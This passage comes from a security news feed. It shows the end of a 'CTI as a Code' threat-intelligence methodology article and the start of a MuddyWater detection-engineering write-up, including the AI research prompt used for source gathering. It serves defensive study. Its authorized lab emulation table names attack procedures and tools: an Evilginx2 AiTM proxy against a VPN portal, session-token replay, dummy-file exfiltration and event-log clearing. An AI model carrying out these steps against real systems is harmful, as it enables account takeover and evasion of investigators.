|</pre><p><strong>P0 items are not detection rules — they are infrastructure prerequisites.</strong> The backlog separates these explicitly so the sprint plan is realistic: you cannot write an AiTM detection rule if the VPN logs are not in the SIEM. Making this visible prevents teams from reporting “rule written” while the actual gap remains open.</p><pre>git add .<br>git commit -m "PROJ-002: proactive complete — SCN-001 modeled, detection backlog 7 items (2 blocked on pipeline)"</pre><h3>Full Cycle Mode: Building a CTI Program</h3><p>Full Cycle applies when the task is not a single investigation but building the capability to run investigations continuously. It produces a governance structure, a PIR framework, and a collection plan.</p><pre>cp -r CTI_as_a_Code/templates/full-cycle/ programs/myorg-cti-program-2025/<br>cd programs/myorg-cti-program-2025/<br>git init &amp;&amp; git add . &amp;&amp; git commit -m "PROJ-003: full-cycle scaffold initialized"</pre><p>Before any program design work begins, run the intake to capture the sponsor’s mandate, stakeholder map, initial PIRs, and maturity target.</p><p>→ <strong>Full-Cycle Program — Intake</strong> — full intake form (program mandate, stakeholders, PIR register, collection requirements, sharing architecture, governance), why each section matters, and how to commit the intake as the program’s first artifact.</p><p><strong>Key outputs of full-cycle mode:</strong></p><p><strong>Stakeholder map</strong> — who receives what intelligence, at what classification level, on what schedule:</p><pre>| Stakeholder | Role | Products | TLP | Cadence |<br>|---|---|---|---|---|<br>| CISO | Executive sponsor | Strategic brief, program metrics | AMBER | Monthly |<br>| SOC Lead | Operational consumer | Tactical alert, IOC packages | RED | On-demand |<br>| Detection Engineering | Technical consumer | Sigma backlog, hunting hypotheses | RED | Weekly sprint |<br>| Legal / Compliance | Regulatory | Incident reports, regulatory notifications | AMBER | Per incident |<br>| CERT-IL | External sharing | Anonymized IOC packages | GREEN | Per incident |</pre><p><strong>PIR register</strong> — every PIR linked to a stakeholder decision:</p><pre>| ID | PIR | Stakeholder | Decision it drives | Review cadence |<br>|---|---|---|---|---|<br>| PIR-001 | Is the Iranian-nexus AiTM cluster from CERT-IL CB-2025-041 actively targeting our contractor VPN? | CISO | Contractor access architecture review | Monthly |<br>| PIR-002 | What is the current detection coverage rate across our top-10 adversary techniques? | SOC Lead | Sprint prioritization and backlog ordering | Bi-weekly |<br>| PIR-003 | Are any of our third-party suppliers under active targeting by nation-state actors? | Legal / Procurement | Supplier risk assessment and contract reviews | Quarterly |</pre><p><strong>Collection plan</strong> — sources mapped to PIRs, with gaps made explicit:</p><pre>| Source | PIRs | Reliability | Current status | Gap |<br>|---|---|---|---|---|<br>| CERT-IL advisories | PIR-001, PIR-003 | A/1 (High) | Active MOU — weekly digest | None |<br>| Internal SIEM alerts | PIR-002 | A/1 (High) | Active | VPN logs not ingested — ENG-001 |<br>| Recorded Future | PIR-001, PIR-002 | B/2 (Medium-High) | No subscription | Procurement Q3 2025 |<br>| Sector ISAC | PIR-003 | B/2 (Medium-High) | Membership lapsed | Renewal in progress |</pre><p>Collection gaps that block PIR answers are tracked as program risks with owners and deadlines — not just technical notes. A PIR that cannot be answered because a log source is not ingested is a program failure, not a SIEM problem.</p><h3>Adversary Emulation Mode: Validating Coverage</h3><p>Emulation runs after detections have been built. It answers the question: do these rules actually work against a real adversary executing these techniques?</p><pre>cp CTI_as_a_Code/templates/adversary-emulation.md \<br>   exercises/myorg-emulation-q3-2025.md</pre><p><strong>Build the emulation plan from a CTI report:</strong></p><pre># Emulation Plan — Operation Desert Cipher (Q3 2025)<br>## Authorization<br>Authorized by: CISO - ref: AUTH-2025-Q3-001<br>Scope: JUMPHOST-LAB and TARGET-LAB only; no production systems<br>Date: 2025-07-14 through 2025-07-16<br>## Threat intelligence basis<br>CTI report: training/A04-emulation-techpay/01-cti-report/operation-desert-cipher.md<br>Actor: Assessed Iranian-nexus cluster<br>## Module table<br>| # | Technique | Procedure | Tool | Expected alert | Pre-check |<br>|---|---|---|---|---|---|<br>| MOD-01 | T1566.001 | Send .docx with embedded macro | GoPhish | Email gateway + EDR | Email gateway logs ingested? |<br>| MOD-02 | T1557 | AiTM proxy against lab VPN portal | Evilginx2 | VPN auth anomaly rule | VPN logs in SIEM? |<br>| MOD-03 | T1078.001 | Replay captured session token | curl | Anomalous auth rule | DET-003 deployed? |<br>| MOD-04 | T1021.001 | RDP from jump host to target | mstsc | Lateral movement rule | Jump host Sysmon running? |<br>| MOD-05 | T1059.001 | Execute PowerShell from RDP session | powershell.exe | T1059 rule | DET-005 deployed? |<br>| MOD-06 | T1048.003 | Exfil dummy file via HTTPS | curl | Egress detection | DB audit rule deployed? |<br>| MOD-07 | T1070.001 | Clear Windows event logs | wevtutil | Log-clearing alert | DET-007 deployed? |</pre><p><strong>Execute and score:</strong></p><pre># Post-execution: scan lab evtx with all Sigma rules<br>hayabusa csv-timeline \<br>  --directory ./lab-evtx/ \<br>  --output emulation-results-$(date +%Y%m%d).csv \<br>  --profile verbose<br># Check which modules fired<br>grep -E "T1557|T1078|T1059|T1048|T1021|T1070|T1566" emulation-results-*.csv</pre><p><strong>Coverage matrix with root cause for every FAIL:</strong></p><pre>| Module | Technique | Result | Root Cause | Remediation |<br>|---|---|---|---|---|<br>| MOD-01 | T1566.001 | PARTIAL | Rule fired; attachment hash missing — email gateway log field not parsed | Fix Logstash parser for email gateway |<br>| MOD-02 | T1557 | FAIL | Rule not deployed — VPN log pipeline not complete at exercise date | ENG-001 still open; reschedule after pipeline completes |<br>| MOD-03 | T1078.001 | PASS | Alert within 90 seconds | — |<br>| MOD-04 | T1021.001 | PASS | Alert within 2 min | — |<br>| MOD-05 | T1059.001 | PASS | Alert within 45 seconds | — |<br>| MOD-06 | T1048.003 | FAIL | Data source missing — DB audit log pipeline not complete | ENG-002 still open |<br>| MOD-07 | T1070.001 | PASS | Alert within 20 seconds | — |<br>## Summary: 4 PASS (57%) | 1 PARTIAL (14%) | 2 FAIL (29%)<br>## Both FAILs trace to open engineering tickets, not missing detection rules.</pre><h3>Git Discipline — The Same for All Modes</h3><p>The git log is the audit trail. Commit phase by phase with informative messages:</p><pre># After intake<br>git add 00-scope/intake.md<br>git commit -m "PROJ-001: intake — initial hypothesis AiTM contractor theft; 3 PIRs identified"<br># After scope sign-off<br>git add 00-scope/scope.md<br>git commit -m "PROJ-001: scope - signed off by CISO 2025-03-18; TLP AMBER; legal hold"<br># After evidence inventory<br>git add 01-evidence/<br>git commit -m "PROJ-001: evidence - 5 sources, GAP-001 (4h Sysmon 03-17), checksums committed"<br># After timeline and claims<br>git add 03-analysis/<br>git commit -m "PROJ-001: analysis - 16 events, 5 claims; PIR-001 answered YES (CL-002)"<br># After ATT&amp;CK mapping<br>git add 03-analysis/attck-mapping/<br>git commit -m "PROJ-001: ATT&amp;CK mapping - 6 techniques, 2 rule-missing, 2 data-missing, 1 incomplete"<br># After detections validated<br>git add 04-detections/<br>git commit -m "PROJ-001: detections - DET-001 to DET-004 validated PASS via Hayabusa"<br># After deliverables complete<br>git add 05-deliverables/<br>git commit -m "PROJ-001: deliverables - executive brief and SOC handoff; INCD notification ready"</pre><p><strong>Rules:</strong></p><ul><li>One commit per completed phase — not one bulk commit at the end</li><li>Never edit a committed evidence file — create a new amendment document and commit that</li><li>Commit messages: project ID + phase + factual one-line summary of what changed</li><li>When an assessment changes (e.g., CL-003 confidence downgraded), commit the change with a message explaining why</li></ul><h3>Minimum-Viable Path: No Lab Required</h3><p>The full methodology runs without Docker. Replace each lab component:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tR6BsLsvAFquFYPRJMsbAA.png"></figure><p>The intake template, evidence labels, claims ledger, ATT&amp;CK gap taxonomy, and git commit discipline apply identically with or without the lab stack.</p><h3>The Ecosystem</h3><p>CTI as a Code is one part of a practitioner ecosystem:</p><ul><li><a href="https://anpa1200.github.io/CTI_as_a_Code/">CTI as a Code</a> — Lab stack, investigation scaffolds, and training assignments. Use when running an investigation or building detection coverage.</li><li><a href="https://anpa1200.github.io/cti-analyst-field-manual/">CTI Analyst Field Manual</a> — Analytic tradecraft standard. Use when you need the full methodology behind evidence labels, PIR design, attribution, and CTI-to-detection.</li><li><a href="https://anpa1200.github.io/israel-government-threat-actors-cti/">Israel Government Threat Actors CTI</a> — Israeli sector threat knowledge base. Use when working on any Israeli government, CII, or public sector engagement.</li><li><a href="https://anpa1200.github.io/customer-driven-ai-cti-project/">Customer-Driven AI CTI</a> — CTI delivery methodology. Use when turning CTI work into a managed customer engagement with quality gates.</li><li><a href="https://anpa1200.github.io/CTI_as_a_Code/ecosystem">Ecosystem page</a> — End-to-end cross-project workflows.</li></ul><p>See the <a href="https://anpa1200.github.io/CTI_as_a_Code/ecosystem">Ecosystem page</a> for end-to-end cross-project workflows.</p><h3>Where to Start</h3><pre># Get the project<br>git clone https://github.com/anpa1200/CTI_as_a_Code.git<br>cd CTI_as_a_Code<br># Reactive: copy the template, run intake, start scoping<br>cp -r templates/reactive/ ../my-first-investigation/<br>cd ../my-first-investigation/<br>git init &amp;&amp; git add . &amp;&amp; git commit -m "PROJ-001: scaffold initialized"<br>cp 00-scope/scope.md 00-scope/intake.md   # use the intake template from this article<br># fill in intake.md during the first call, then scope.md after<br># Or open a fully worked example to see the complete methodology applied<br>ls CTI_as_a_Code/training/A01-reactive-lifetech/</pre><p>The 8 training assignments in the repository are fully populated: project brief, synthetic evidence data, all analytical files, and worked solutions. <strong>A01</strong> (reactive, 52-hour Iranian-nexus breach) is the best starting point for reactive work. <strong>A02</strong> (proactive, nation-state telecom targeting) for proactive. <strong>A04</strong> and <strong>A08</strong> for adversary emulation.</p><p>The methodology in this article is exactly what runs through all 8 assignments.</p><p><em>Tags: Threat Intelligence · CTI · Detection Engineering · Incident Response · Sigma · MITRE ATT&amp;CK · Blue Team · Cybersecurity</em></p><h4>Follow My Work</h4><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><p><strong>Andrey Pautov</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=dda5ef496a46" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46">CTI as a Code: Complete Step-by-Step Methodology</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana]]></title>
<description><![CDATA[11 validated detections from public sources, OpenCTI graph, and a one-command labTable of ContentsMost threat actor writeups stop too early. They describe the group, list ATT&CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: what do I actually do with th...]]></description>
<link>https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>11 validated detections from public sources, OpenCTI graph, and a one-command lab</em>Table of Contents</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HvRb4_s15JQ6FkA9ng-8w.png"></figure><p>Most threat actor writeups stop too early. They describe the group, list ATT&amp;CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: <em>what do I actually do with this on Monday?</em></p><p>Operation Desert Hydra is an answer to that question.</p><p>This article documents a full CTI-to-detection pipeline focused on <strong>MuddyWater</strong> — an Iranian state-linked actor (MOIS) that has been targeting Israeli government, defense, and critical infrastructure organizations since at least 2019. By the end, you’ll have 11 detection records, 12 Kibana proof screenshots, and a working lab you can deploy with a single command.</p><p>Everything is on my GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra">github.com/anpa1200/operation-desert-hydra</a></p><p><a href="https://github.com/anpa1200/operation-desert-hydra">GitHub - anpa1200/operation-desert-hydra: OpenCTI-based CTI-to-Detection Knowledge Graph for Iranian activity against Israeli organizations</a></p><ol><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#86dc"><strong>Why MuddyWater?</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#aadd"><strong>The Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c6f3"><strong>Phase 1: Source Gathering</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#205e"><strong>Phase 2: Procedure Dataset</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#fb48"><strong>Phase 3: OpenCTI Knowledge Graph</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c2e1"><strong>Phase 4: Detection Atlas</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8ce1"><strong>Phase 5: Validation Lab</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#0a42"><strong>Validation Results Summary</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8cf4"><strong>Phase 6: Coverage Matrix</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dfaa"><strong>What Defenders Should Do Right Now</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#b8cc"><strong>Reproduce It Yourself</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dbb0"><strong>Production Scars</strong></a></li></ol><h3>Why MuddyWater?</h3><p>Three reasons:</p><ol><li><strong>Rich public reporting.</strong> CISA, Israel’s INCD, ClearSky, Deep Instinct, Mandiant, and Proofpoint have all published detailed technical analysis. This gives enough procedure-level specificity to engineer real detections.</li><li><strong>Consistent playbook.</strong> Across five years of reporting, the same pattern recurs: spearphishing → scripting engine → encoded PowerShell → RMM tool. The consistency makes it detectable.</li><li><strong>Relevant geography.</strong> The actor consistently targets Israeli organizations — a geography with high analytical value and underserved public detection coverage.</li></ol><h3>The Pipeline</h3><p>The project enforces a chain from source to Kibana screenshot:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NDsnhzE7S-lzy0fSIOZrsw.png"></figure><pre>source → claim → procedure → ATT&amp;CK mapping → telemetry requirement<br>  → detection pseudologic → benign simulation → lab result → coverage score</pre><p>No step is skipped. Every claim has a source. Every detection has a validation case. Every PASS has a screenshot.</p><h3>Phase 1: Source Gathering</h3><p>The first step is source discovery, not detection writing.</p><h4>Traditional Source Gathering — and Why It’s Not Enough Alone</h4><p>The standard workflow for CTI source gathering looks like this: run keyword searches (Google, Google Dorks, site: operators for known vendor blogs), check your Threat Intelligence Platform for existing reports on the actor, subscribe to vendor RSS feeds, pull ISAC/ISAO advisories, and query your organization’s TIP for any existing indicator sets or finished intelligence reports tagged to the actor.</p><p>For a mature, well-documented actor like MuddyWater this gets you to maybe 15–20 well-known sources quickly — the CISA advisory, the MITRE ATT&amp;CK page, two or three vendor blog posts you already knew about. The problem is coverage holes: you’ll reliably find sources that are already in your network’s vocabulary and miss the ones that aren’t. A CERT-IL PDF published in Hebrew and linked only from a government portal, a Group-IB campaign teardown behind a partial paywall, or a 2020 ClearSky report that predates your current TIP subscription window — all of these can fall out of a manual search pass.</p><p>TIPs compound this in a specific way: they surface what has already been ingested and tagged. If a source was never promoted into your TIP (because it was published before the subscription started, or because no analyst had time to import it), it is invisible inside the platform. The TIP is authoritative for what it knows, not for the universe of available sources.</p><h4>AI research</h4><p>The parallel AI research pass was not a replacement for traditional gathering — it was a coverage supplement. After both approaches ran, the traditional pass and the AI outputs were merged into the same deduplication step. The AI outputs added approximately 40 sources beyond what a manual search surfaced; traditional search added discipline about sources the models hallucinated (fabricated URLs, mis-attributed PDFs). Neither was sufficient alone.</p><p>I ran parallel deep-research passes using Gemini and OpenAI, both given the same prompt. Each returned a candidate source register. Both outputs were compared, deduplicated (71 candidates → 8 promoted), and the surviving sources were manually acquired and reviewed before anything entered the dataset.</p><h4>The Actual Prompt</h4><p>This is the exact prompt used — both models received it verbatim:</p><pre>You are a senior CTI researcher and source-validation analyst. For Operation Desert Hydra,<br>gather the best public sources on MuddyWater / Seedworm / Mango Sandstorm / TA450 and<br>related Iranian activity against Israeli organizations. Goal: create a source register for<br>an OpenCTI-based CTI-to-detection knowledge graph:<br>Source → Actor → Campaign → Procedure → ATT&amp;CK Technique → Observable → Log Source<br>→ Detection → Validation → Coverage.<br>Search MITRE ATT&amp;CK, CISA/FBI/NSA, Israel National Cyber Directorate, Microsoft,<br>Google/Mandiant, ESET, Check Point, ClearSky, Unit 42, Proofpoint, SentinelOne,<br>Recorded Future, Symantec, Talos, Trend Micro, Kaspersky, Cloudflare/Hunt.io/DomainTools,<br>GitHub, and academic sources.<br>Include secondary comparison actors only as comparison: APT34, APT35/Charming Kitten/Mint<br>Sandstorm, CyberAv3ngers, Agrius. Do not merge actors unless a source explicitly supports<br>overlap.<br>For every source, return this YAML structure:<br>  id, title, publisher, url, direct_download_url, download_type, publication_date,<br>  access_date, actor_claims, source_type, reliability, relevance flags for<br>  actor_profile/procedures/malware/infrastructure/detections/validation_lab/opencti_modeling,<br>  key_entities, key_attck_techniques, source_summary, use_for_project, limitations.<br>Provide direct PDF/STIX/JSON/CSV/GitHub raw links where available; if unavailable write<br>direct_download_url: none_found. Do not invent URLs or dates.<br>Use evidence labels:<br>  Observed = directly shown in telemetry/sample/log/screenshot/source artifact<br>  Reported = stated by source<br>  Assessed = source judgment<br>  Inferred = analyst conclusion from multiple cited facts<br>  Gap = unknown or not proven<br>Do not upgrade source claims, do not treat ATT&amp;CK mapping as attribution evidence, do not<br>treat shared tooling as actor identity proof, and do not claim detection coverage without<br>validation.<br>Search exact terms including:<br>  MuddyWater Iran MOIS, MuddyWater Seedworm, MuddyWater Mango Sandstorm,<br>  MuddyWater TA450, MuddyWater POWERSTATS, PowGoop, MuddyViper, MuddyWater Israel,<br>  Israeli organizations, PowerShell, RMM, phishing, spearphishing, Exchange CVE-2020-0688,<br>  CVE-2017-0199, MITRE ATT&amp;CK, CISA FBI NSA advisory, Mango Sandstorm Microsoft,<br>  TA450 Proofpoint, Seedworm Symantec, ESET, ClearSky, Unit 42, Check Point, Mandiant,<br>  SentinelOne, Recorded Future, Talos, Trend Micro, Kaspersky;<br>  also: APT34 Israel, APT35 Israel, Mint Sandstorm Israel, CyberAv3ngers Israel,<br>  Agrius Israel, Iranian threat actors Israeli organizations.<br>Output only these sections:<br>  1) Executive Source Assessment<br>  2) High-Priority Source Register with 10-20 best sources in YAML<br>  3) Extended Source Register<br>  4) Direct Downloads Table<br>  5) Actor Alias / Overlap Notes<br>  6) Procedure Extraction Candidates grouped by tactic with source_ids, evidence_label,<br>     ATT&amp;CK candidate, required telemetry, detection opportunity, validation_possible<br>  7) OpenCTI Modeling Candidates<br>  8) Detection Engineering Opportunities marked candidate only<br>  9) Gaps And Manual Review Items<br>The final output must be usable to seed data/sources.yaml, data/procedures.yaml,<br>docs methodology, OpenCTI import plan, and detection atlas.</pre><h4>What the Prompt Is Designed to Do</h4><p>A few decisions worth explaining:</p><p><strong>Output schema in the prompt.</strong> Asking for a specific YAML field list (id, title, publisher, url, direct_download_url…) forces the model to either produce usable data or leave a visible blank — no vague summaries. direct_download_url: none_found is the required answer when a URL doesn't exist, which prevents the model from inventing one.</p><p><strong>Evidence labels baked in.</strong> The five labels (Observed / Reported / Assessed / Inferred / Gap) are defined in the prompt so the model applies them consistently and the output is ready to feed directly into data/procedures.yaml without reformatting.</p><p><strong>Explicit anti-hallucination rules.</strong> “Do not invent URLs or dates.” “Do not upgrade source claims.” “Do not treat ATT&amp;CK mapping as attribution evidence.” These are not just principles — they are instructions the model can fail visibly on, which makes QA faster.</p><p><strong>Parallel models, same prompt.</strong> Running Gemini and OpenAI on the same prompt and comparing outputs catches source fabrications: if one model lists a URL the other doesn’t, that URL gets verified before it enters the register. Two models that agree independently on a source add confidence; one model alone that lists something unusual is a flag.</p><h4>The Review Gate</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p--8CFcThnLuDmZiNyOdQg.png"></figure><p>Every source that came out of the AI output went through this checklist before being promoted into data/sources.yaml:</p><ul><li>Is the URL real and accessible?</li><li>Is the publication date accurate?</li><li>Does the content actually describe MuddyWater procedures (not just mention the name)?</li><li>Is there at least one procedure-level claim (not just “actor uses PowerShell”)?</li><li>Is the actor identification explicit or inferred from shared tooling only?</li></ul><p>71 candidates → 8 government/vendor sources promoted. The rest were duplicates, secondary summaries, or sources that named the actor without procedure-level specificity.</p><h4>Research Artifacts (All in the Repo)</h4><p>Every file from the source gathering workflow is version-controlled and publicly accessible:</p><ul><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/Gemini-research.md"><strong>Gemini-research.md</strong></a> — Raw Gemini deep-research output: candidate source register in YAML, procedure extraction candidates, OpenCTI modeling candidates, detection opportunities, gaps.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/openAI-research.md"><strong>openAI-research.md</strong></a> — Raw OpenAI deep-research output: executive assessment, high-priority sources, extended source register, direct download list, actor alias notes.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/relevant-research-list.md"><strong>relevant-research-list.md</strong></a> — Deduplicated candidate list after comparing both model outputs: 71 sources, acquisition targets for Step 5.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-acquisition-report.md"><strong>source-acquisition-report.md</strong></a> — Results of the automated fetch run: HTTP status, content type, file size, and extraction status for all 71 sources.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-reliability-evidence-assessment.md"><strong>source-reliability-evidence-assessment.md</strong></a> — Analyst review notes: reliability ratings, evidence quality, promotion decisions, and limitations per source.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/tree/main/docs/source-gathering/raw-sources"><strong>raw-sources/</strong></a> — 71 numbered source folders, each containing metadata.json, headers.txt, the raw source file, extracted source.txt, and fallback reader output.</li></ul><h4><strong>Promoted sources (highest weight):</strong></h4><ul><li><strong>CISA AA22–055A (Feb 2022)</strong> — Full procedure survey: PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin; WMI survey script; credential dumping tools.</li><li><strong>INCD 2023</strong> — Israeli campaign specifics: ScreenConnect/SimpleHelp RMM abuse, Egnyte/OneDrive lures, Log4j + Exchange exploitation.</li><li><strong>INCD 2024</strong> — BugSleep analysis: 43-minute scheduled task beacon, VPN exploitation, new RMM tools (Level, PDQConnect).</li></ul><p>Supporting vendor sources: ClearSky, Deep Instinct, Group-IB, Mandiant, Proofpoint, Sekoia.io, Symantec.</p><h4>Why These Three Have the Highest Weight</h4><p>The reliability assessment used a two-axis rubric: <strong>Source Reliability (A–F)</strong> separating publication discipline from content, and <strong>Information Credibility (1–6)</strong> rating how well each claim is grounded.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*672ETgk4DFDJDE0G2-sLgA.png"></figure><p><strong>CISA AA22–055A — Reliability A, Credibility 2</strong></p><p>This is a joint advisory signed by five national authorities: CISA, FBI, CNMF, NCSC-UK, and NSA. That multi-agency co-signature is not ceremonial — each agency must independently agree to the technical content before it publishes. The advisory names specific malware families (PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin), includes an actual WMI PowerShell survey script attributed to MuddyWater, and lists credential-dumping tool names. Evidence label: Reported / Assessed. The PDF acquired locally at raw-sources/07-u-s-cyber-command-defense-media-aa22-055a-pdf-mirror/source.pdf is the authoritative copy distributed via Defense Media Activity. Credibility is 2, not 1, because the advisory states TTPs based on intelligence assessment rather than a single intercepted artifact — but the authority behind that assessment is as high as public-source CTI gets.</p><p><strong>INCD 2023 (MuddyWater / DarkBit PDF) — Reliability A, Credibility 2</strong></p><p>The Israel National Cyber Directorate is the government authority responsible for civilian cyber defense in Israel, the primary target country for this actor. This report covers a specific Israeli campaign including: tool names (ScreenConnect, SimpleHelp), file-sharing lure services (Egnyte, OneDrive), exploitation of Log4j and Exchange CVE-2020–0688, and deployment of ransomware (DarkBit) as a cover operation. Evidence label: Observed / Reported / Assessed. The "Observed" label means the INCD had direct visibility into the incident — not a secondary summary. This gives procedure-level specificity that generic vendor threat intel doesn't reach. Acquired at raw-sources/17-israel-national-cyber-directorate-muddywater-darkbit-pdf/source.pdf.</p><p><strong>INCD 2024 (BugSleep PDF) — Reliability A, Credibility 2</strong></p><p>Same publisher authority as INCD 2023, focused on MuddyWater’s 2024 evolution. Key content: BugSleep backdoor analysis, the specific 43-minute scheduled task beacon interval (which became proc_mw_0006 and det_mw_0006), VPN exploitation, and new RMM tools (Level, PDQConnect). The 43-minute interval is a concrete behavioral fingerprint — not a general TTP category — and it came from direct INCD analysis. Evidence label: Observed / Reported / Assessed. Acquired at raw-sources/18-israel-national-cyber-directorate-technological-advancement-and-evolution-of-muddywater-in/source.pdf.</p><p>The three sources share a common characteristic: they are not secondary aggregators or vendor marketing. They are government authorities with direct incident visibility reporting on specific Israeli campaigns.</p><h4>Steps After Deduplication: What Actually Happened to All 71 Sources</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XeokisYTU_DGw6UH7bLB3w.png"></figure><p>After the AI outputs were merged and deduplicated, 71 candidate sources remained. Here is what happened to them across Steps 5–9:</p><p><strong>Step 5 — Automated Acquisition</strong></p><p>tools/fetch_research_sources.py ran against all 71 URLs. For each source it created a numbered folder under docs/source-gathering/raw-sources/ with:</p><pre>raw-sources/<br>  01-mitre-att-ck-muddywater-g0069/<br>    metadata.json        # URL, fetch timestamp, HTTP status, content-type, size<br>    headers.txt          # Raw HTTP response headers<br>    source.html / source.pdf / source.txt   # Primary file<br>    source.txt           # Text extract (for PDFs and HTML)<br>    fallback-reader.txt  # Reader-mode fallback if primary was blocked or JS-rendered</pre><p>Not all fetches succeeded. Some sources returned 403 (vendor gating), some required JS rendering (only fallback text was captured), and two PDFs were corrupted. The acquisition report at docs/source-gathering/source-acquisition-report.md records the HTTP status, file size, and extraction status for all 71.</p><p><strong>Step 6 — Reliability and Credibility Rating</strong></p><p>Each acquired source was rated using the two-axis rubric. The full assessment table is in docs/source-gathering/source-reliability-evidence-assessment.md. Outcome breakdown:</p><ul><li>Reliability A (government / primary standard): 23 sources</li><li>Reliability B (usually reliable vendor / research publisher): 25 sources</li><li>Reliability C (secondary / news / marketing): 18 sources</li><li>Reliability F (failed acquisition or cannot judge): 5 sources</li></ul><p><strong>Step 7 — Promotion Decision</strong></p><p>Only sources with a combination of Reliability A or B, Credibility 2 or better, a usable acquisition, and at least one procedure-level claim were promoted into data/sources.yaml. The rest were assigned one of: Use as corroboration, Use as comparison only, Defer, or Exclude.</p><p>71 candidates → 8 primary sources promoted into the dataset. The 63 that were not promoted are retained in raw-sources/ for future work; they are not discarded.</p><p><strong>Step 8 — Claim Extraction</strong></p><p>For each promoted source, specific claims were extracted with source binding and evidence labels. A claim is not “MuddyWater uses PowerShell” — it is: “CISA AA22–055A (AA22–055A PDF, p.4) reports that MuddyWater actors deploy PowGoop, a DLL loader that decrypts and executes a PowerShell backdoor (Reported)." This source-bound format prevents claim drift downstream.</p><p><strong>Step 9 — Procedure Candidate Extraction</strong></p><p>From the bound claims, 10 procedure candidates were grouped by tactic: Initial Access, Execution, Persistence, Defense Evasion, Discovery, C2, Credential Access. Each candidate recorded: required telemetry, detection opportunity, whether lab validation was feasible, and whether the procedure appeared in multiple independent sources (a promotion signal for higher confidence scores later).</p><h4>The Full 71-Source Candidate List</h4><p>This is the deduplicated list produced after comparing Gemini and OpenAI outputs. Every source here was an acquisition target for Step 5.</p><p><strong>Core MuddyWater / Seedworm / TA450 / Mango Sandstorm</strong></p><ol><li><a href="https://attack.mitre.org/groups/G0069/">MITRE ATT&amp;CK — MuddyWater G0069</a></li><li><a href="https://attack.mitre.org/software/S0223/">MITRE ATT&amp;CK — POWERSTATS S0223</a></li><li><a href="https://attack.mitre.org/software/S1046/">MITRE ATT&amp;CK — PowGoop S1046</a></li><li><a href="https://www.cisa.gov/news-events/alerts/2022/02/24/iranian-government-sponsored-muddywater-actors-conducting-malicious">CISA alert — Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber Operations</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A advisory page</a></li><li><a 